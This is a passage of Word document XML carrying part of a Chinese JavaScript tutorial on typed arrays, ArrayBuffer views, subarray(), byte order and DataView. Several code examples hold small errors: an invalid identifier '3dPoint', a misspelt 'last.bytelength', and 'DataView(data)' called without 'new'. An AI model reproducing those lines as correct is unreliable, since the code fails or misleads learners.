      </w:pPr>
      <w:r>
        <w:t>while(a[++p])/*empty*/;//</w:t>
      </w:r>
      <w:r>
        <w:t>下一个未标记的索引值是素数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(a[n])n--;//</w:t>
      </w:r>
      <w:r>
        <w:t>反向循环找到最大的素数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return n;//</w:t>
      </w:r>
      <w:r>
        <w:t>将它返回</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如果将其中的</w:t>
      </w:r>
      <w:r>
        <w:t>Int8Array()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数替换成传统的</w:t>
      </w:r>
      <w:r>
        <w:t>Array()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，</w:t>
      </w:r>
      <w:r>
        <w:t>sieve()</w:t>
      </w:r>
      <w:r>
        <w:t>函数依然可用，但是，处理过程中可能需要</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>倍的时间，而且需要更多的内存来存储大的参数</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>的值。当处理图形相关的数字或者数学相关的数字的时候，类型化数组也很有用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var matrix=new Float64Array(9);//</w:t>
      </w:r>
      <w:r>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>3×3</w:t>
      </w:r>
      <w:r>
        <w:t>的矩阵</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var 3dPoint=new Int16Array(3);//3D</w:t>
      </w:r>
      <w:r>
        <w:t>空间中的</w:t>
      </w:r>
      <w:r>
        <w:t>一点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var rgba=new Uint8Array(4);//</w:t>
      </w:r>
      <w:r>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>字节的</w:t>
      </w:r>
      <w:r>
        <w:t>RGBA</w:t>
      </w:r>
      <w:r>
        <w:t>像素值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sudoku=new Uint8Array(81);//</w:t>
      </w:r>
      <w:r>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>9×9</w:t>
      </w:r>
      <w:r>
        <w:t>的数独板</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的中括号表示法可以获取和设置类型化数组的单个元素。然而，类型化数组自己还定义了一些用于设置和获取整个数组内容的方法。其中</w:t>
      </w:r>
      <w:r>
        <w:t>set()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用于将一个常规或者类型化数组复制到一个类型化数组中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bytes=new Uint8Array(1024)//1KB</w:t>
      </w:r>
      <w:r>
        <w:t>缓冲区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var pattern=new Uint8</w:t>
      </w:r>
      <w:r>
        <w:t>Array([0,1,2,3]);//</w:t>
      </w:r>
      <w:r>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bytes.set(pattern);//</w:t>
      </w:r>
      <w:r>
        <w:t>将它们复制到另一个数组的开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bytes.set(pattern,4);//</w:t>
      </w:r>
      <w:r>
        <w:t>在另一个偏移量处再次复制它们</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bytes.set([0,1,2,3],8);//</w:t>
      </w:r>
      <w:r>
        <w:t>或直接从一个常规数组复制值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类型化数组还有一个</w:t>
      </w:r>
      <w:r>
        <w:t>subarray()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，调用该方法返回部分数组内容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ints=new Int16Array([0,1,2,3,4,5,6,7,8,9]);//10</w:t>
      </w:r>
      <w:r>
        <w:t>个短整数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var last3=ints.suba</w:t>
      </w:r>
      <w:r>
        <w:t>array(ints.length-3,ints.length);//</w:t>
      </w:r>
      <w:r>
        <w:t>最后三个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>last3[0]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>7:</w:t>
      </w:r>
      <w:r>
        <w:t>等效于</w:t>
      </w:r>
      <w:r>
        <w:t>ints[7]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>subarray()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不会创建数据的副本。它只是直接返回原数组的其中一部分内容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ints[9]=-1;//</w:t>
      </w:r>
      <w:r>
        <w:t>改变原数组中的元素值，然后</w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>last3[2]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>-1:</w:t>
      </w:r>
      <w:r>
        <w:t>同时也改变子数组中的元素值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>subarray()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回当前数组的一个新视图，这一事实，说明了类型化数组中某些重要的概念：它们都是基本字节块的视图，称为一个</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>。每个类型化数组都有与基本缓冲区相关的三个属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>last3.buffer//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>last3.buffer==ints.buffer//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>两者都是同一缓冲区上的视图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>last3.byteOffset//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>14:</w:t>
      </w:r>
      <w:r>
        <w:t>此视图从基本缓冲区的第</w:t>
      </w:r>
      <w:r>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:t>个字节开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>last.bytelength//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>6:</w:t>
      </w:r>
      <w:r>
        <w:t>该视图是</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>字节（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位整数）长</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>对象自身只有一个返回它长度的属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>last3.byteLength//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>6:</w:t>
      </w:r>
      <w:r>
        <w:t>此视图</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>个字节长</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>last3.buffer.byteLength//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>20:</w:t>
      </w:r>
      <w:r>
        <w:t>但是基本缓冲区长度有</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>个字节长</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>只是不透明的字节块。可以通过类型化数组获取这些字节，但是</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>自己并不是一个类型化数组。然而，要注意的是：可以像对任意</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象那样，使用数字数组索引来操作</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>。但是，这样做并不能赋予访问缓冲区中字节的权限</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bytes=new Uint8Array(8);//</w:t>
      </w:r>
      <w:r>
        <w:t>分配</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>个字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bytes[0]=1;//</w:t>
      </w:r>
      <w:r>
        <w:t>把第一个字节设置为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bytes.buffer[0]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>undefined:</w:t>
      </w:r>
      <w:r>
        <w:t>缓冲区没有索引值</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bytes.buffer[1]=255;//</w:t>
      </w:r>
      <w:r>
        <w:t>试着错误地设置缓冲区中的字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bytes.buffer[1]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>255:</w:t>
      </w:r>
      <w:r>
        <w:t>这只设置一个常规的</w:t>
      </w:r>
      <w:r>
        <w:t>JS</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bytes[1]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0:</w:t>
      </w:r>
      <w:r>
        <w:t>上面这行代码并没有设置字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以直接使用</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数来创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>，有了</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>对象后，可以在该缓冲区上创建任意数量的类型化数组视图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var buf=new ArrayBuffer(1024*1024);//1MB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var asbytes=new Uint8Array(buf);//</w:t>
      </w:r>
      <w:r>
        <w:t>视为字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var asints=new Int32Array(buf);//</w:t>
      </w:r>
      <w:r>
        <w:t>视为</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>位有符号整数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var lastK=new </w:t>
      </w:r>
      <w:r>
        <w:t>Uint8Array(buf,1023*1024);//</w:t>
      </w:r>
      <w:r>
        <w:t>视最后</w:t>
      </w:r>
      <w:r>
        <w:t>1KB</w:t>
      </w:r>
      <w:r>
        <w:t>为字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ints2=new Int32Array(buf,1024,256);//</w:t>
      </w:r>
      <w:r>
        <w:t>视第二个</w:t>
      </w:r>
      <w:r>
        <w:t>1KB</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>256</w:t>
      </w:r>
      <w:r>
        <w:t>个整数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类型化数组允许将同样的字节序列看成</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>位、</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位、</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>位或者</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:t>位的数据块。这里提到了</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>字节顺序</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>：字节组织成更长的字的顺序。为了高效，类型化数组采用底层硬件的原生顺序。在低位优先（</w:t>
      </w:r>
      <w:r>
        <w:t>little-endian</w:t>
      </w:r>
      <w:r>
        <w:t>）系统中，</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>中数字的字节是按照从低位到高位的顺序排列的。在高位优先（</w:t>
      </w:r>
      <w:r>
        <w:t>big-endian</w:t>
      </w:r>
      <w:r>
        <w:t>）系统中</w:t>
      </w:r>
      <w:r>
        <w:t>，字节是按照从高位到低位的顺序排列的。可以使用如下代码来检测系统的字节顺序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果整数</w:t>
      </w:r>
      <w:r>
        <w:t>0x00000001</w:t>
      </w:r>
      <w:r>
        <w:t>在内存中表示成：</w:t>
      </w:r>
      <w:r>
        <w:t>01 00 00 00</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>则说明当前系统是低位优先系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>相反，在高位优先系统中，它会表示成：</w:t>
      </w:r>
      <w:r>
        <w:t>00 00 00 01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var little_endian=new Int8Array(new Int32Array([1]).buffer)[0]===1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如今，大多数</w:t>
      </w:r>
      <w:r>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:t>架构都采用低位优先。然而，很多的网络协议以及有些二进制文件格式，是采用高位优先的字节顺序的。</w:t>
      </w:r>
      <w:r>
        <w:t>22.6</w:t>
      </w:r>
      <w:r>
        <w:t>节将</w:t>
      </w:r>
      <w:r>
        <w:t>会介绍如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>来存储从文件中读取到的或者是从网络中下载下来的字节。当这么做的时候，要考虑平台的字节顺</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>序。通常，处理外部数据的时候，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Int8Array</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Uint8Array</w:t>
      </w:r>
      <w:r>
        <w:t>将数据视为一个单字节数组，但是，不应该使用其他的多字节字长的类型化数组。取而代之的是可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>DataView</w:t>
      </w:r>
      <w:r>
        <w:t>类，该类定义了采用显式指定的字节顺序从</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>中读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写其值的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data;//</w:t>
      </w:r>
      <w:r>
        <w:t>假设这是一个来自网络的</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var view=DataView(data);//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个视图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var int=view.getInt32(0);//</w:t>
      </w:r>
      <w:r>
        <w:t>从字节</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>开始的，高位优先顺序的</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>位有符号</w:t>
      </w:r>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>整数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>int=view.getInt32(4,false);//</w:t>
      </w:r>
      <w:r>
        <w:t>接下来的</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>位</w:t>
      </w:r>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>整数也是高位优先顺序的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>int=view.getInt32(8,true)//</w:t>
      </w:r>
      <w:r>
        <w:t>接下来的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节视为低位优先顺序的有符号</w:t>
      </w:r>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>整数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
